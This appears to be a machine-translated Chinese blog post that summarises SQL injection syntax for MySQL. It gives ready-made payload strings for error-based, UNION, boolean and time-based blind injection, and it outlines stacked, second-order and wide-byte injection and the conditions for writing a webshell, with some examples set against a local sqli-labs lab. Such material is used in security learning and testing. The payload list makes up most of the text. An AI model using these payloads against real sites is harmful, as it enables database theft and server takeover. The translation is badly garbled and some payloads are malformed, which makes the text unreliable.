当前位置：网站首页>[network security] SQL injection syntax summary

So-called SQL Inject , It's through SQL Command insert into Web Submit the form or enter the domain name Or the query string requested by the page , Finally, to cheat the server to execute malicious SQL command
SQL Syntax allows database commands to be mixed with user data . If Developers are not careful Words , User data may be interpreted as commands , In this case , Remote users will not only be able to Web Apply input data , And you can execute any command on the database .

Two 、SQL Injection judgment method

1. Character type detection

Character type judgment url Whether there is injection , stay url Add a Single quotation marks

url: http://127.0.0.1/sqli-labs-master/Less-1/?id=1’

Such an error will be displayed , It roughly means that you have a sql Grammar mistakes , When adding %23 An annotation character will be displayed normally .

When we're in url Enter after the single quotation mark of the column URL and 1=1 Time page According to the normal .

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=1#

When we put 1=1 Switch to 1=2 when Page error reporting

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=2#

2. Digital detection

Direct input and 1=1 see .

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=1

It's possible to Display the page normally Of , Then we are making a further judgment 1=2 when .

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2

Found that the page has changed , Then we can judge that it is a digital injection , Because digital injection does not need quotation marks . Just Be similar to int equally .

3. Search detection and xx Type detection

This is a kind of character type detection , It just needs to be carried out according to different error information The structure is closed .

3、 ... and 、union Inject

1.order by And error reporting injection

select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));

2.union The joint query

?id=111’ union select 1,2,(group_concat(table_name) from information_schema.tables where table_schema=‘ Database name ’) --+

Four 、 Blind note

1. Bull's blind note

（1） Query database length

and (length(database()))>8%23

（2） Query the current database name

and (ascii(substr(database(),1,1)))<120 %23

（3） Query the number of tables under the database

and (select count(*) from information_schema.tables where table_schema=' Database name ')>4 %23

（4） Query the first table name in the database

and  (length((select table_name from information_schema.tables where table_schema=' Database name ' limit 0,1)))=6%23

（5） Query the number of fields in the following table of the database

and  (ascii(substr((select table_name from information_schema.tables where table_schema=' Database name ' limit 0,1),1,1))>100)%23

（6） Judge the length of the first field in the following table of the database

and  (length((select column_name from information_schema.columns where table_schema=' Database name ' and table_name=' Table name ' limit 0,1)))=2%23

（7） Query the first digit of the first field in the following table of the database

and  (ascii(substr((select column_name from information_schema.columns where table_schema=' Database name ' and table_name=' Table name ' limit 0,1),1,1)))=105 %23

（8） Get the first data of field detection

and (ascii(substr((select  Field name  from  Table name  limit 0,1),1,1)))=68 %23

2. Time blind note

（1） Determine whether there is a delay function

and sleep(5) %23

（2） Query the length of the current database , If correct, then delay 5 second

and if((length(database()))>7,sleep(5),1) --+

（3） Judge whether the first digit of the current database name is a

and if((substr(database(),1,1)='a'),sleep(5),1)  %23

（4） Determine the first place of the current database name ascii Is it 100

and if((ascii(substr(database(),1,1))=100),sleep(5),1)  %23

（5） Number of query tables

and if((select count(*) from information_schema.tables where table_schema=' Database name ')=4,sleep(5),1)%23

（6） Query table name length

and if((select length((select table_name from information_schema.tables where table_schema=' Database name ' limit 3,1))=5),sleep(5),1)%23

（7） Intercept the first place of the table name

and if((select ascii(substr((select table_name from information_schema.tables where table_schema=' Database name  limit 3,1),1,1)))=117,sleep(5),1)%23

（8） Query the number of column fields

and if(((select count(*) from information_schema.columns where table_schema=' Database name ' and table_name='users')=3),sleep(5),1)%23

（9） Query column name length

and if((select length((select column_name from information_schema.columns where table_schema=' Database name ' and table_name=' Table name ' limit 0,1))=2),sleep(5),1)%23

（10） Take the first place in the column

and if((select ascii(substr((select column_name from information_schema.columns where table_schema=' Database name ' and table_name=' Table name ' limit 0,1),1,1)))=105,sleep(5),1)%23

（11） Inquire about id Length of the first data

and if((select length((select id from  Table name   limit 0,1)))=1,sleep(5),1)%23

（12） Get the content of data information

and if((select ascii(substr((select id from  Table name   limit 0,1),1,1)))=49,sleep(5),1)%23

5、 ... and 、 An error injection

（1）floor()

and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) %23

（2）extractvalue()

select * from  Database name  where id=1 and (extractvalue(1,concat(0x7e,(select  Table name ()),0x7e)));

（3）updatexml()

select * from  Database name  where id=1 and (updatexml(1,concat(0x7e,(select  Table name ()),0x7e),1));

（4）geometrycollection()

select * from  Database name where id=1 and geometrycollection((select * from(select * from(select  Table name ())a)b));

（5）multipoint()

select * from  Database name  where id=1 and multipoint((select * from(select * from(select  Table name ())a)b));

（6）polygon()

select * from  Database name  where id=1 and polygon((select * from(select * from(select  Table name ())a)b));

（7）multipolygon()

select * from  Database name  where id=1 and multipolygon((select * from(select * from(select  Table name ())a)b));

（8）linestring()

select * from  Database name  where id=1 and linestring((select * from(select * from(select  Table name ())a)b));

（9）multilinestring()

select * from  Database name  where id=1 and multilinestring((select * from(select * from(select  Table name ())a)b));

（10）exp()

select *  Database name  test where id=1 and exp(~(select * from(select  Table name ())a));

6、 ... and 、 Stack Injection

principle ： The principle of Stack Injection : mysql_multi_query() Support multiple sql Statements execute simultaneously , That's it. ; Separate , Piles of execution sql sentence

for example

select * from users;show databases;

Just execute the above two commands at the same time , So we can add, delete, modify and check , As long as the authority is enough
Although this injection posture is very awesome , But in reality, there are few , It may be affected by API Or database engine , Or the restriction of permission can only be implemented when calling database functions sql Statement , utilize mysqli_multi_query() Function supports multiple sql Statements execute simultaneously , But in reality , Such as PHP In order to prevent sql Injection mechanism , The functions that are often used to call the database are mysqli_ query() function , It can only execute one statement , What follows the semicolon will not be executed , Therefore, it can be said that the use conditions of stack injection are very limited , Once it can be used , It may pose a great threat to the website .

7、 ... and 、 The secondary injection

The secondary injection , It can be summarized as the following two steps :

（1） Insert malicious data

When inserting data into the database , About the Special characters are escaped , stay Write to database At the same time, the original data is retained .

（2） Quoting malicious data

By default, the data stored in the database is safe , When making a query , Directly from the database Extract malicious data , Treatment without further inspection .

8、 ... and 、 Wide byte Injection

（1） principle

When passing a parameter id=1‘ It's time , When we enter this single quotation mark , Would be considered to be Illegal characters , Will be Filter function add “\” Filter out , So we want the program to accept that the parameters we pass contain single quotes , Then you need to put this escape character “\” kill , Then how can we kill it ？ When http When the protocol is transmitted , Is to go through url Coded , If this coding is complete , When delivered to the server , We can precede single quotation marks Add a %81 This has to be coded , Finally, when decoding like this , This %81 And “/” The corresponding codes are combined according to gbk Coding requires decoding , All that's left is a single quote .

（2） Conditions

Ⅰ： The database query is set to GBK code
Ⅱ： Used addslashes(),mysql_real_escape_string(),mysql_escape_string() Functions like that

Nine 、dnslog Inject

（1） Conditions

mysql.ini in secure_file_priv Must be empty
●secure_file_priv by null Import and export are not allowed
●secure_file_priv by /tmp Import and export can only be done in /tmp Under the table of contents
●secure_file_priv It's empty time Import and export are allowed without restrictions

Ten 、SQL Injection write webshell

（1） Conditions

Ⅰ： At present sql The injection user must be DBA jurisdiction （--is-dba by true）
Ⅱ： Need to know the website Absolute path
Ⅲ：My.ini This configuration in the file secure_file_priv=”” It's empty